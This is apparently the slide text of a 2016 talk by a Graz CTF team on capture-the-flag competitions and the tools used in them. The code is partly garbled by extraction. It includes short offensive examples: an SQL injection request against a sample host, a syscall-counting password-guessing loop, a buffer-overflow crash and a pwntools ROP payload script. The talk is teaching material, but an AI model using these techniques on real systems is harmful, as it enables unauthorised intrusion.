A CTF Hackers Toolbox Grazer Linuxtage 2016
$ who
mike/@f0rki
@stefan2904
[email protected]
[email protected]
CS/InfoSec Student
CS/InfoSec/CI Student
CTF Player since 2010
CTF Player since 2014
CTF: Capture The Flag
Collaborative hacking competitions Teams vs. Teams
The goal is to capture flags
CTF{THIS_IS_A_FLAG}
CTF Type: Jeopardy
Figure: Sharif CTF Challenge Board
CTF Type: Attack-Defense
Figure: RUCTFe 2015 Network Schema (source: RUCTF org)
CTF Type: Attack-Defense
Figure: FAUST CTF 2015 scoreboard
Why CTFs?
It’s fun! Gain experience in Information Security Challenges modeled after real-world problems Sometimes real-world bugs modeled after CTF bugs?
LosFuzzys: A CTF Team in Graz
We Like Bugs!
LosFuzzys: A CTF Team in Graz
A group of people interested in information security Primarily CS/SW/ICE Students from TUGraz But we welcome anyone interested and motivated :) and maybe even you ;)
Irregular Meet-ups
Where to start?
Talk to us! :-) https://hack.more.systems twitter: @LosFuzzys Read writeups! Repo: github.com/ctfs Ours: hack.more.systems/writeups
CTF Toolbox
CTF Toolbox
Great diversity of challenges Some things turn up frequently Knowledge of technology necessary Experience helps a lot Using the right tools is essential assuming you know how to use them . . .
Scripting is your best Friend Be comfortable in automating things Use whatever works best bash, zsh etc. Python, Ruby etc.
Command-Line-Fu is very helpful
Standard utils – grep, sed, awk, sort, cut, uniq, . . . Network stuff – nc, socat, dig, nmap Query json – jq HTTP – curl ... Pipe together to get your results!
Bash Password Guessing
for x in q w e r t y u i o p a s d f g h j k l z \ x c v b n m QW E R T Y U I O P A S D F G H J \ K L Z X C V B N M 1 2 3 4 5 6 7 8 9 0 "−" "_" " ? " do e c h o "= $x =" # count s i g a c t i o n s y s c a l l s s t r a c e . / s t a g e 3 . b i n " D i d _ y o u _ l $ x $ x $ x $ x $ x $ x $ x $ x " 2>&1 \ | grep s i g a c t i o n \ | wc − l done > l o g # g e t h i g h e s t c o u n t o f s i g a c t i o n s and t r i g g e r i n g c h a r c a t l o g | g r e p −B 1 \ " $ ( c a t l o g | g r e p −v = | s o r t | u n i q | t a i l −n 1 ) "
Automated Browsing – python-requests
import requests URL = ’ h t t p : / / c t f . e x a m p l e . com ’ s = requests . session () r = s . p o s t (URL + ’ / l o g i n ’ , d a t a={ ’ u s e r ’ : ’ f u z z y ’ , ’ p a s s ’ :
’ 1234 ’ } )
# GET h t t p : / / c t f . e x a m p l e . com/ v u l n ? x =’ o r%201=1−−x r e s p = s . g e t (URL + ’ / v u l n ’ , params={ ’ x ’ : ’ \ ’ o r 1=1 −−x ’ } ) # s e s s i o n c o o k i e a u t o m a g i c a l l y used here print resp . text # f l a g { some_flag_of_some_service }
Dirty Networking – pwntools from pwn i m p o r t ∗ r = r e m o t e ( ’ c t f . e x a m p l e . com ’ , 1 3 3 7 ) # r. r. r.
l i n e based r e c v l i n e () s e n d l i n e ( ’HELO %s%s%s%s ’ ) r e c v u n t i l ( ’ 250 H e l l o ’ )
data = r . recv (4) # unpack LE u i n t 3 2 from b i n i = u32 ( d a t a ) l o g . i n f o ( ’ r e c e i v e d u i n t 3 2 {} ’ . f o r m a t ( i ) ) # pack BE u i n t 3 2 t o b i n r . s e n d ( p32 ( 1 0 9 4 7 9 5 5 8 5 , e n d i a n= ’ b i g ’ ) ) r . r e c v l i n e ()
Finding & Analyzing Vulnerabilities
Analyzing Java/.NET Apps
Great decompilers! Java/Dalvik bytecode intellij built-in decompiler (fernflower), procyon http://www.javadecompilers.com/
Android apps/Dalvik bytecode apktool, smali/baksmali, jadx Xposed
.NET bytecode ILSpy, Jetbrains dotPeek
A wild binary appears! $ f i l e . / pwn pwn : ELF 32− b i t LSB e x e c u t a b l e , I n t e l 8 0 3 8 6 , v e r s i o n 1 (GNU/ L i n u x ) , s t a t i c a l l y l i n k e d , f o r GNU/ L i n u x 2 . 6 . 2 4 , not s t r i p p e d
$ objdump -d ./pwn | less
Keep Calm And Use radare2 From git
radare2 – example commands
Search for functions containing "exec" afl~exec Show/search all strings in the file izz izz~FLAG Compute CRC32 over next 32 byte #crc32 32
Binary Decompilers
No really good open source binary decompilers :( The radare guys are working on one
Commercial/Closed-Source Hex-Rays/IDA Pro Decompiler ($$$) Hopper ($) retdec (free, webservice, no x86_64)
Debugging?
Debuggers
Use gdb with one of those: PEDA GEF pwndbg voltron gdb-dashboard
gdb alternatives: lldb, radare2 Newer debugging approaches qira rr
Pwning! $ mkfifo ./ f i f o $ . / pwn . / f i f o & p y t h o n −c ’ p r i n t ( "A" ∗ 4 1 2 8 ) ’ >> . / f i f o [ 1 ] 9391 The f i l e h a s been s a v e d s u c c e s s f u l l y [ 1 ] + 9391 s e g m e n t a t i o n f a u l t ( c o r e dumped ) . / pwn . / f i f o $ dmesg | t a i l −n 1 pwn [ 9 3 9 1 ] : s e g f a u l t a t 41414141 i p 0000000041414141 s p 00000000 f f b 6 d 3 4 0 e r r o r 14
pwntools again! from pwn i m p o r t ∗
# NOQA
v e l f = ELF ( " . / pwn" ) r = ROP( v e l f ) r . call (" exit " , [42]) p a y l o a d = "A" ∗ 4124 + s t r ( r ) # launch process vp = p r o c e s s ( [ " . / pwn" , " . / f i f o " ] ) gdb . a t t a c h ( vp ) # b r e a k ∗0 x 8 0 4 8 f 4 e w i t h open ( " . / f i f o " , "w" ) a s f : f . write ( payload ) # forward s t d i n / stdout to p r o c e s s s t d i n / stdout vp . i n t e r a c t i v e ( )
pwntools/binjitsu
I/O abstraction (called Tubes) ELF parser/info Return Oriented Programming (ROP) Shellcode plug’n’pwn shellcode builder
Binary data “parsing” ...
Cryptography
Crypto Tools
Pen & Paper sage CAS & python
packages implementing attacks, e.g. python-paddingoracle hashpumpy (hash length extension attack) ...
Learn to Improvise
Premature optimization* is the root of all evil! * also commenting code * also clean code
(only true for attack && during CTFs!) If it works once, . . . it works! Code-reuse between different CTFs! Post-CTF code cleanup would be good . . .
A fool with a tool is still a fool!
https://hack.more.systems
Thanks to all LosFuzzys members tuflowgraphy.at realraum IAIK
Writeups of Used Examples
https://hack.more.systems/writeups 9447ctf: premonition (web) NDH quals 2016: matriochka (reversing) NDH quals 2016: secure file reader (pwn)
don’t be eve!